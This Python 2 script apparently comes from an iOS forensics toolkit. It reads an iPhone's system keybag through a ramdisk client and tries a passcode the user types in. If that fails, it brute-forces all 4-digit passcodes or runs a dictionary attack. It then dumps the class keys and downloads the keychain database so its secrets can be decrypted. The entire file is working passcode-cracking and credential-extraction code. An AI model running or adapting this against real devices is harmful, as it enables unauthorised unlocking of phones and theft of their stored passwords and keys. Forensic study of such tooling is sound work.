89 lines
3.8 KiB
Python
89 lines
3.8 KiB
Python
import plistlib
|
|
import os
|
|
from keystore.keybag import Keybag
|
|
from keychain.keychain4 import Keychain4
|
|
from keychain.managedconfiguration import bruteforce_old_pass
|
|
from util.ramdiskclient import RamdiskToolClient
|
|
from util import write_file
|
|
|
|
def bf_system():
|
|
curdir = os.path.dirname(os.path.abspath(__file__))
|
|
client = RamdiskToolClient()
|
|
di = client.getDeviceInfos()
|
|
devicedir = di["udid"]
|
|
if os.getcwd().find(devicedir) == -1:
|
|
try:
|
|
os.mkdir(devicedir)
|
|
except:
|
|
pass
|
|
os.chdir(devicedir)
|
|
key835 = di.get("key835").decode("hex")
|
|
|
|
systembag = client.getSystemKeyBag()
|
|
kbkeys = systembag["KeyBagKeys"].data
|
|
kb = Keybag.createWithDataSignBlob(kbkeys, key835)
|
|
keybags = di.setdefault("keybags", {})
|
|
kbuuid = kb.uuid.encode("hex")
|
|
print "Keybag UUID :", kbuuid
|
|
if True and keybags.has_key(kbuuid) and keybags[kbuuid].has_key("passcodeKey"):
|
|
print "We've already seen this keybag"
|
|
passcodeKey = keybags[kbuuid].get("passcodeKey").decode("hex")
|
|
print kb.unlockWithPasscodeKey(passcodeKey)
|
|
kb.printClassKeys()
|
|
else:
|
|
keybags[kbuuid] = {"KeyBagKeys": systembag["KeyBagKeys"]}
|
|
di["KeyBagKeys"] = systembag["KeyBagKeys"]
|
|
di.save()
|
|
print "Enter passcode or leave blank for bruteforce:"
|
|
z = raw_input()
|
|
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, z)
|
|
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
|
|
print "Passcode \"%s\" OK" % z
|
|
di.update(res)
|
|
keybags[kbuuid].update(res)
|
|
di.save()
|
|
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
|
|
write_file("keychain-2.db", keychain_blob)
|
|
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
|
|
return
|
|
if z != "":
|
|
print "Wrong passcode, trying to bruteforce !"
|
|
if kb.passcodeComplexity == 0:
|
|
print "Trying all 4-digits passcodes..."
|
|
bf = client.bruteforceKeyBag(systembag["KeyBagKeys"].data)
|
|
if bf:
|
|
di.update(bf)
|
|
keybags[kbuuid].update(bf)
|
|
print bf
|
|
print kb.unlockWithPasscodeKey(bf.get("passcodeKey").decode("hex"))
|
|
kb.printClassKeys()
|
|
di["classKeys"] = kb.getClearClassKeysDict()
|
|
di.save()
|
|
else:
|
|
print "Complex passcode used, trying dictionary attack ..."
|
|
dictfile = os.path.join(curdir, 'wordlist.dict')
|
|
try:
|
|
wordlist = open(dictfile, 'r').readlines()
|
|
except (OSError, IOError), e:
|
|
exit(e)
|
|
for line in wordlist:
|
|
res = client.getPasscodeKey(systembag["KeyBagKeys"].data, line.rstrip('\n'))
|
|
if kb.unlockWithPasscodeKey(res.get("passcodeKey").decode("hex")):
|
|
print "Passcode \"%s\" OK" % line.rstrip('\n')
|
|
di.update(res)
|
|
keybags[kbuuid].update(res)
|
|
di.save()
|
|
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
|
|
write_file("keychain-2.db", keychain_blob)
|
|
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
|
|
return
|
|
print "Passcode not found!"
|
|
return
|
|
|
|
#keychain_blob = client.downloadFile("/private/var/Keychains/keychain-2.db")
|
|
keychain_blob = client.downloadFile("/mnt2/Keychains/keychain-2.db")
|
|
write_file("keychain-2.db", keychain_blob)
|
|
print "Downloaded keychain database, use keychain_tool.py to decrypt secrets"
|
|
|
|
bf_system()
|